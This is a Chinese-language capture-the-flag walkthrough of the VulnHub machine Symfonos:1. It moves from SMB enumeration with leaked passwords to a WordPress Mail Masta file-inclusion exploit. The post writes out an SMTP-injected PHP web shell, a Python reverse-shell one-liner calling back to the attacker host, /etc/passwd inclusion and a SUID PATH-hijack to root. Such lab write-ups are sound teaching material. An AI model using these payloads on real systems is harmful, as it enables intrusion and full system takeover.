希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!
个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog
Symfonos 靶机下载地址:https://www.vulnhub.com/entry/symfonos-1,322/
0x01 信息收集
Nmap扫描目标主机,发现开放22、25、80、139、445端口,分别运行ssh、smtp、http、smb服务。
┌──(root㉿ch4ser)-[~]
└─# nmap -p- -sV -sC -A 192.168.196.141
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-17 08:15 CST
Nmap scan report for 192.168.196.141
Host is up (0.00034s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after: 2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open ᴮsՕ Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:AA:38:6B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
尝试DirSearch扫描80端口网站目录,没有扫出来有价值的信息。
由于目标主机开放smb服务,尝试使用smbclient连接,成功列出目标主机上的共享文件夹列表。
其中Sharename为共享文件夹的名称:print$为打印机驱动程序的共享文件夹,helios为用户helios个人共享文件夹,anonymous为匿名共享文件夹,IPC$为IPC服务的共享文件夹。
┌──(root?ch4ser)-[~]
└─# smbclient -L 192.168.196.141
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
helios Disk Helios personal share
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SYMFONOS
尝试连接到anonymous匿名共享文件夹,因为一般来说anonymous不需要身份认证。
发现attention.txt,将其下载到本地并查看,其内容为Zeus叫员工停止使用'epidioko', 'qwerty', 'baseball'这三个密码,被他发现就要炒鱿鱼了,那看来Zeus应该是个老板哈哈哈。
┌──(root㉿ch4ser)-[~]
└─# smbclient //192.168.196.141/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jun 29 09:14:49 2019
.. D 0 Sat Jun 29 09:12:15 2019
attention.txt N 154 Sat Jun 29 09:14:49 2019
19994224 blocks of size 1024. 17305336 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec)
smb: \> exit
┌──(root㉿ch4ser)-[~]
└─# cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
尝试连接用户helios个人共享文件夹,指定用户名为helios,使用'epidioko', 'qwerty', 'baseball'这三个密码进行身份认证,其中'qwerty'为正确密码。
todo.txt内容表明该用户要在/h3l105上工作,由此猜测/h3l105可能为某网站目录。
┌──(root㉿ch4ser)-[~]
└─# smbclient //192.168.196.141/helios -U helios
Password for [WORKGROUP\helios]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jun 29 08:32:05 2019
.. D 0 Sat Jun 29 08:37:04 2019
research.txt A 432 Sat Jun 29 08:32:05 2019
todo.txt A 52 Sat Jun 29 08:32:05 2019
19994224 blocks of size 1024. 17305336 blocks available
smb: \> get research.txt
getting file \research.txt of size 432 as research.txt (210.9 KiloBytes/sec) (average 210.9 KiloBytes/sec)
smb: \> get todo.txt
getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 118.2 KiloBytes/sec)
smb: \> exit
┌──(root㉿ch4ser)-[~]
└─# cat research.txt
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
┌──(root㉿ch4ser)-[~]
└─# cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
访问/h3l105发现是一个WordPress网站,Wappalyzer显示WordPress版本为5.2.2
0x02 权限获取 - WordPress任意文件包含
使用wpscan扫描该WordPress站点,发现其mail-masta版本为1.0,可能存在漏洞利用。
wpscan项目地址:https://github.com/wpscanteam/wpscan wpscan
┌──(root㉿ch4ser)-[~]
└─# wpscan --url http://192.168.196.141/h3l105/ --plugins-detection aggressive
............
[+] mail-masta
| Location: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
| Readme: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/, status: 200
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt
使用searchsploit搜索mail-masta相关漏洞利用代码并查看,得知poc为:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/h3l105//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
┌──(root㉿ch4ser)-[~]
└─# searchsploit masta
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2) | php/webapps/50226.py
WordPress Plugin Mail Masta 1.0 - SQL Injection | php/webapps/41438.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿ch4ser)-[~]
└─# find / -name 40290.txt
/root/40290.txt
/usr/share/exploitdb/exploits/php/webapps/40290.txt
┌──(root㉿ch4ser)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/40290.txt
[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.
Typical proof-of-concept would be to load passwd file:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
页面成功返回相关内容,即此处存在任意文件包含。
继续尝试包含webshell,由于没有找到文件上传点,一般思路是进行日志包含,即访问路径带有一句话木马写入日志然后包含。
这里不采用这种方式,因为前面信息收集发现目标主机开放smtp邮件服务,所以想到可以给用户helios发送邮件然后包含其默认邮件路径/var/mail/helios。
┌──(root㉿ch4ser)-[~]
└─# telnet 192.168.196.141 25
Trying 192.168.196.141...
Connected to 192.168.196.141.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM: Ch4ser
RCPT TO: helios
data
<?php system($_GET['shell']); ?>
.
QUIT250 2.1.0 Ok
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
250 2.0.0 Ok: queued as C4C0840698
221 2.0.0 Bye
Connection closed by foreign host.
访问以下路径发现刚才的邮件已经写进去了,这里没有webshell代码是正常的,说明被执行了。
/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
那么现在只需要反弹shell即可得到会话,但我测试bash反弹不回来,python则可以。
反弹shell在线生成网站:https://forum.ywhack.com/shell.php
192.168.196.141/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.196.128",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
成功得到普通用户helios的权限。
┌──(root㉿ch4ser)-[~]
└─# nc -lvvp 7777
listening on [any] 7777 ...
192.168.196.141: inverse host lookup failed: Unknown host
connect to [192.168.196.128] from (UNKNOWN) [192.168.196.141] 52208
/bin/sh: 0: can't access tty; job control turned off
$ whoami
helios
$ id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
0x03 权限提升 - SUID&环境变量
查找SUID文件,发现/opt/statuscheck可能可以利用,但具体还是要看其能否执行命令。
$ python -c 'import pty;pty.spawn("/bin/bash")'
<h3l105/wp-content/plugins/mail-masta/inc/campaign$ find / -perm -u=s -type f 2>/dev/null
<inc/campaign$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
使用命令strings大概看一下/opt/statuscheck干了些什么,发现它会执行curl命令。
<h3l105/wp-content/plugins/mail-masta/inc/campaign$ strings /opt/statuscheck
...........
curl -I H
...........
来到/tmp目录,新建一个名为curl的文件让其执行/bin/bash,并将/tmp导入环境变量。
<h3l105/wp-content/plugins/mail-masta/inc/campaign$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
执行/opt/statuscheck,由于其享有SUID权限,会以root身份执行我们的curl,而它会执行/bin/bash,最后成功拿下root权限和flag。
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# whoami
whoami
root
# id
id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:1!
\ __
--==/[})))==*
/ \ ' ,|
`\`\ //| ,|
\ `\ //,/' -~ |
) _-~~~\ |/ / |'| _-~ / ,
(( /' ) | \ / /'/ _-~ _/_-~|
((( ; /` ' )/ /'' _ -~ _-~ ,/'
) )) `~~\ `\\/'/|' __--~~__--\ _-~ _/,
((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /
((\~\ | ) | ' / __--~~ \-~~ _-~
`\(\ __--( _/ |'\ / --~~ __--~' _-~ ~|
( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~
~~\~~~~~~ `\-~ \~\ / __--~~~'~~/
;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._
;;;;;;;;' / ---~~~/_.-----.-~ _.._ ~\
;;;;;;;' / ----~~/ `\,~ `\ \
;;;;' ( ---~~/ `:::| `\\.
|' _ `----~~~~' / `:| ()))),
______/\/~ | / / (((((())
/~;;.____/;;' / ___.---( `;;;/ )))'`))
/ // _;______;'------~~~~~ |;;/\ / (( (
// \ \ / | \;;,\ `
(<_ \ \ /',/-----' _>
\_| \\_ //~;~~~~~~~~~
\_| (,~~
\~\
~~
Contact me via Twitter @zayotic to give feedback!